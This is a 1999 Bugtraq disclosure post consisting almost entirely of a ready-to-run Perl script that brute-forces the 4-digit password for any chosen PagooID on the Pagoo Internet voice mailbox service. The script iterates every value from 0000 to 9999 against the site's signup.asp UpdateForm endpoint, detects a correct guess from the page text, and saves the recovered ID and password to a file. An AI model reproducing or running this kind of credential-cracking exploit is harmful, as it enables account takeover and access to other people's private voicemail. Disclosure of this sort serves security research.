[10882] in bugtraq
hhp: Pagoo VMB remote exploit.
daemon@ATHENA.MIT.EDU (Elaich Of Hhp)
Wed Jun 23 13:39:06 1999
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-Id: <Pine.LNX.4.10.9906221304370.64-100000@ns.suspend.net>
Date: Tue, 22 Jun 1999 13:06:05 -0400
Reply-To: hhp@NS.SUSPEND.NET
From: Elaich Of Hhp <hhp@NS.SUSPEND.NET>
To: BUGTRAQ@NETSPACE.ORG
#!/usr/bin/perl
#
# (hhp) hhp-pagoo.pl (hhp)
# by: elaich of the hhp.
# http://hhp.hemp.net/
# '99'
#
# The (Pagoo Internet voice MailBox) exploit.
# Available at http://www.pagoo.com/
#
# This exploit will extract the password to
# the specified PagooID you specify.
#
# The vulnerability comes into play when you
# connect to your UpdateForm thru signup.asp
# which requires your PagooID and your 4
# digit password.
#
# Nothing will prevent you from reconnecting
# and trying a new password from 0000 in
# increments of 1 till we reach 9999 which
# is the highest password possible... I
# could call this a brute, but it always
# 100% of the time will get the passwd
# unlike a brute.
#
# Logs passwds to file: pagooids
use IO::Socket;
die "usage: $0 <PagooID>\n" unless(@ARGV == 1);
($box) = (@ARGV);
open OUT, ">>pagooids" or die "Can't open temp file -> .pagoo\n";
autoflush OUT 1;
$host = "www.pagoo.com";
autoflush STDOUT 1;
sub parse
{
($num) = @_;
$url = "/asp/signup/signup.asp?Service=UpdateForm&PagooID=$box&Password=$num";
$socket = IO::Socket::INET->new(PeerAddr => $host,
PeerPort => 80,
Proto => "tcp") or die "Can't connect.\n";
print $socket "GET $url\n";
print "Trying password: $num of 9999.\n";
while(<$socket>)
{
chomp;
if(/Password invalid/)
{
break;
}
if(/First Name/)
{
print "PagooID password extracted...\n";
print "PagooID: $box / Password: $num\n";
print OUT "PagooID: $box / Password: $num\n";
exit 0;
}
}
}
$num = '0000';
parse $num;
for($i = 0; $i <= 9999; $i++)
{
$num++;
parse $num;
}
